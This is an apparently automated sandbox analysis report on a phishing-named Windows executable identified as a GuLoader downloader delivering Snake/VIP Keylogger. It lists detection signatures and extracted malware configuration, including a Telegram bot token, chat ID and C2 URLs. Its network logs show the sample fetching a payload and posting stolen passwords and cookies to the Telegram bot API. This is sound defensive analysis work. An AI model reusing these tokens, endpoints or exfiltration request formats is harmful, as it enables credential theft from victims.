Windows Analysis Report
ORDER 20240986 OA.exe

Overview

General Information

Sample name: ORDER 20240986 OA.exe
Analysis ID: 1559976
MD5: 9f036462b07002efdf646b0995217bbd
SHA1: fbfd528f12735ecfa48f4d0fde42aef883e1c678
SHA256: 491cf03511ae77ed758d9b36f3237da0ef099370144ed61367146fee1c2bacee
Tags: exe, user-lowmal3

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8", "Chat_id": "6553726543", "Version": "4.4"}
Source: ORDER 20240986 OA.exe.7832.4.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendMessage"}
Source: ORDER 20240986 OA.exe ReversingLabs: Detection: 44%
Source: ORDER 20240986 OA.exe Virustotal: Detection: 33%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: ORDER 20240986 OA.exe Joe Sandbox ML: detected

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE887A8 CryptUnprotectData, 4_2_3AE887A8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE88EF1 CryptUnprotectData, 4_2_3AE88EF1
Source: ORDER 20240986 OA.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49800 version: TLS 1.0
Source: unknown HTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: ORDER 20240986 OA.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_004065DA FindFirstFileW,FindClose, 0_2_004065DA
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004059A9
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_00402868 FindFirstFileW, 4_2_00402868
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_004065DA FindFirstFileW,FindClose, 4_2_004065DA
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004059A9
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0015F45Dh 4_2_0015F2C0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0015F45Dh 4_2_0015F4AC
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0015FC19h 4_2_0015F961
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07566970h 4_2_07566678
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07568AE8h 4_2_075687F0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756C448h 4_2_0756C150
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07563E26h 4_2_07563B58
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756EF50h 4_2_0756EC58
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756030Eh 4_2_07560040
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07566E38h 4_2_07566B40
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07565E16h 4_2_07565B48
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07569940h 4_2_07569648
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756D768h 4_2_0756D470
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07564746h 4_2_07564478
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07560C2Eh 4_2_07560960
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07568158h 4_2_07567E60
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756AC60h 4_2_0756A968
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 075619DEh 4_2_07561710
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07569E08h 4_2_07569B10
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07562BE6h 4_2_07562918
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756C910h 4_2_0756C618
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756E0F8h 4_2_0756DE00
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07564BD7h 4_2_07564908
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07567300h 4_2_07567008
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756B128h 4_2_0756AE30
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07563506h 4_2_07563238
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756DC30h 4_2_0756D938
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756F418h 4_2_0756F120
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 075654F6h 4_2_07565228
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07568620h 4_2_07568328
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756079Eh 4_2_075604D0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 075677C8h 4_2_075674D0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07566347h 4_2_07565FD8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756A2D0h 4_2_07569FD8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756BAB8h 4_2_0756B7C0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756E5C0h 4_2_0756E2C8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 075610BEh 4_2_07560DF0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 075622C6h 4_2_07561FF8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756B5F0h 4_2_0756B2F8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756CDD8h 4_2_0756CAE0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 075642B6h 4_2_07563FE8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756F8E0h 4_2_0756F5E8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756EA88h 4_2_0756E790
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07565066h 4_2_07564D98
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07567C90h 4_2_07567998
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756154Eh 4_2_07561280
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07569478h 4_2_07569180
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07562756h 4_2_07562488
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756BF80h 4_2_0756BC88
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756FDA8h 4_2_0756FAB0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07565986h 4_2_075656B8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07568FB0h 4_2_07568CB8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07561E47h 4_2_07561BA0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756A798h 4_2_0756A4A0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07563076h 4_2_07562DA8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756D2A0h 4_2_0756CFA8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07621FE8h 4_2_07621CF0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07621658h 4_2_07621360
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07620801h 4_2_07620508
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07620CC8h 4_2_076209D0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07620338h 4_2_07620040
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07621B20h 4_2_07621828
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07621190h 4_2_07620E98
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_07663E70
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_07663E60
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_07660A03
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_07660A10
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9E0A9h 4_2_3AC9DE00
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC931E0h 4_2_3AC92DC8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC92C19h 4_2_3AC92968
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9E959h 4_2_3AC9E6B0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9E501h 4_2_3AC9E258
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9F661h 4_2_3AC9F3B8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9F209h 4_2_3AC9EF60
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9EDB1h 4_2_3AC9EB08
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC90D0Dh 4_2_3AC90B30
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC91697h 4_2_3AC90B30
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9D3A1h 4_2_3AC9D0F8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9CF49h 4_2_3AC9CCA0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_3AC90040
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9FAB9h 4_2_3AC9F810
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9DC51h 4_2_3AC9D9A8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC931E0h 4_2_3AC92DB8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9D7F9h 4_2_3AC9D550
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC931E0h 4_2_3AC9310E
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE89280h 4_2_3AE88FB0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE87EB5h 4_2_3AE87B78
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE81449h 4_2_3AE811A0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8F5C6h 4_2_3AE8F2F8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE87571h 4_2_3AE872C8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE85179h 4_2_3AE84ED0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE82151h 4_2_3AE81EA8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8F136h 4_2_3AE8EE68
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8D146h 4_2_3AE8CE78
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE84D21h 4_2_3AE84A78
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE87119h 4_2_3AE86E70
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE81CF9h 4_2_3AE81A50
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE848C9h 4_2_3AE84620
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE86CC1h 4_2_3AE86A18
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE85E81h 4_2_3AE85BD8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8BA76h 4_2_3AE8B7A8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE82E59h 4_2_3AE82BB0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8FA56h 4_2_3AE8F788
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE85A29h 4_2_3AE85780
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8DA66h 4_2_3AE8D798
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE82A01h 4_2_3AE82758
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE855D1h 4_2_3AE85328
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE879C9h 4_2_3AE87720
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8D5D6h 4_2_3AE8D308
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE825A9h 4_2_3AE82300
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8B5E6h 4_2_3AE8B318
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE80B99h 4_2_3AE808F0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8C396h 4_2_3AE8C0C8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8E386h 4_2_3AE8E0B8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE86733h 4_2_3AE86488
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then mov esp, ebp 4_2_3AE8B081
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE80741h 4_2_3AE80498
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE83709h 4_2_3AE83460
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE802E9h 4_2_3AE80040
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8DEF6h 4_2_3AE8DC28
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8BF06h 4_2_3AE8BC38
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE862D9h 4_2_3AE86030
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE832B1h 4_2_3AE83008
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8CCB6h 4_2_3AE8C9E8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE818A1h 4_2_3AE815F8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then mov esp, ebp 4_2_3AE8B1C0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8ECA6h 4_2_3AE8E9D8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE80FF1h 4_2_3AE80D48
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8E816h 4_2_3AE8E548
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8C826h 4_2_3AE8C558

Networking

Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:897506%0D%0ADate%20and%20Time:%2022/11/2024%20/%2006:52:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20897506%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553726543&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b4a7224cc3aHost: api.telegram.orgContent-Length: 580
Source: global traffic HTTP traffic detected: POST /bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553726543&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b6f4848dbcfHost: api.telegram.orgContent-Length: 7045
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 158.101.44.242 158.101.44.242
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49794 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49812 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49783 -> 167.250.5.91:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49806 -> 188.114.96.3:443
Source: global traffic HTTP traffic detected: GET /yak/ZnWGURK2.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sierrassinfinusadas.com.arCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49800 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: sierrassinfinusadas.com.ar
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553726543&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b4a7224cc3aHost: api.telegram.orgContent-Length: 580
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Nov 2024 08:01:55 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
